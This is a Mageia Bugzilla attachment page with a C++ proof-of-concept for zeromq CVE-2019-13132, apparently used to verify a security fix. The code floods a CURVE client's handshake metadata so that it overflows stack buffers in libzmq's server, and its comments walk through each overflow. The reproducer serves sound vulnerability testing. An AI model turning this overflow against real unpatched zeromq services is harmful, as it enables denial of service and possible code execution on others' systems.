Mageia Bugzilla – Attachment 11348 Details for
Bug 25113
zeromq new security issue CVE-2019-13132
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Combined server/client PoC file
repro.cc (text/x-csrc), 2.86 KB, created by
Len Lawrence
on 2019-11-09 20:29:11 CET
(
hide
)
Description:
Combined server/client PoC file
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2019-11-09 20:29:11 CET
Size:
2.86 KB
patch
obsolete
>// CVE-2019-13132 >// https://github.com/zeromq/libzmq/issues/3558 > >#include <string> > >#include <czmq.h> >#include <zmq.h> > >int main() { > zsys_init(); > > // Generate CurveZMQ certificates (public/private key pairs actually) for server and client > zcert_t *serverCert = zcert_new (); > zcert_t *clientCert = zcert_new (); > > // Setup client socket > zsock_t* serverSocket = zsock_new(ZMQ_ROUTER); > // make server to use CURVE secure connection mode > zsock_set_curve_server(serverSocket, 1); > // set the server secret key > zsock_set_curve_secretkey(serverSocket, zcert_secret_txt(serverCert)); > assert(zsock_bind(serverSocket, "tcp://127.0.0.1:7777") != -1); > > // Setup server socket > zsock_t* clientSocket = zsock_new(ZMQ_DEALER); > // Set the server public key > zsock_set_curve_serverkey(clientSocket, zcert_public_txt(serverCert)); > // Set the key pair of client > zsock_set_curve_secretkey(clientSocket, zcert_secret_txt(clientCert)); > zsock_set_curve_publickey(clientSocket, zcert_public_txt(clientCert)); > // Set metadata property of the client socket > > // This basically set a tons of data into socket metadata, and ZMQ will use it to generate a handshake package > // for CurveCP auth schema: > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_client.cpp#L182 > // > // We make the size huge so that it will overflow > for (size_t i = 0; i < 200; ++i ) { > std::string property( > std::string("X-Property") + std::to_string(i) + std::string(":ABCDEFG0123456789") > ); > assert(zmq_setsockopt (zsock_resolve(clientSocket), ZMQ_METADATA, property.c_str(), property.size()) == 0); > } > > // This will initiate the connection to server with our CurveCP auth package and the oversize metadata in it. > // 1. Server will get the message payload here: > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L274-L275 > // > // 2. The size `clen` is calculated based on the payload size minus a fixed length of other part in the payload > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L327 > // > // 3. The memory for decrypting the crypto box are allocated in stack with fixed size > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L329-L331 > // > // 4. The first overflow comes in, we copy the message data to fixed stack buffer array without boundary check > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L335-L336 > // > // 5. The second overflow comes in, we try to decrypt the crypto box and put the oversize result into fixed > // stack buffer array > // > // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L342-L343 > // > assert(zsock_connect(clientSocket, "tcp://127.0.0.1:7777") != -1); > > sleep(10); > > zsys_shutdown(); > return 0; >} >
// CVE-2019-13132 // https://github.com/zeromq/libzmq/issues/3558 #include <string> #include <czmq.h> #include <zmq.h> int main() { zsys_init(); // Generate CurveZMQ certificates (public/private key pairs actually) for server and client zcert_t *serverCert = zcert_new (); zcert_t *clientCert = zcert_new (); // Setup client socket zsock_t* serverSocket = zsock_new(ZMQ_ROUTER); // make server to use CURVE secure connection mode zsock_set_curve_server(serverSocket, 1); // set the server secret key zsock_set_curve_secretkey(serverSocket, zcert_secret_txt(serverCert)); assert(zsock_bind(serverSocket, "tcp://127.0.0.1:7777") != -1); // Setup server socket zsock_t* clientSocket = zsock_new(ZMQ_DEALER); // Set the server public key zsock_set_curve_serverkey(clientSocket, zcert_public_txt(serverCert)); // Set the key pair of client zsock_set_curve_secretkey(clientSocket, zcert_secret_txt(clientCert)); zsock_set_curve_publickey(clientSocket, zcert_public_txt(clientCert)); // Set metadata property of the client socket // This basically set a tons of data into socket metadata, and ZMQ will use it to generate a handshake package // for CurveCP auth schema: // // https://github.com/zeromq/libzmq/blob/master/src/curve_client.cpp#L182 // // We make the size huge so that it will overflow for (size_t i = 0; i < 200; ++i ) { std::string property( std::string("X-Property") + std::to_string(i) + std::string(":ABCDEFG0123456789") ); assert(zmq_setsockopt (zsock_resolve(clientSocket), ZMQ_METADATA, property.c_str(), property.size()) == 0); } // This will initiate the connection to server with our CurveCP auth package and the oversize metadata in it. // 1. Server will get the message payload here: // // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L274-L275 // // 2. The size `clen` is calculated based on the payload size minus a fixed length of other part in the payload // // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L327 // // 3. The memory for decrypting the crypto box are allocated in stack with fixed size // // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L329-L331 // // 4. The first overflow comes in, we copy the message data to fixed stack buffer array without boundary check // // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L335-L336 // // 5. The second overflow comes in, we try to decrypt the crypto box and put the oversize result into fixed // stack buffer array // // https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L342-L343 // assert(zsock_connect(clientSocket, "tcp://127.0.0.1:7777") != -1); sleep(10); zsys_shutdown(); return 0; }
View Attachment As Raw
Actions:
View
Attachments on
bug 25113
: 11348 |
11349
|
11350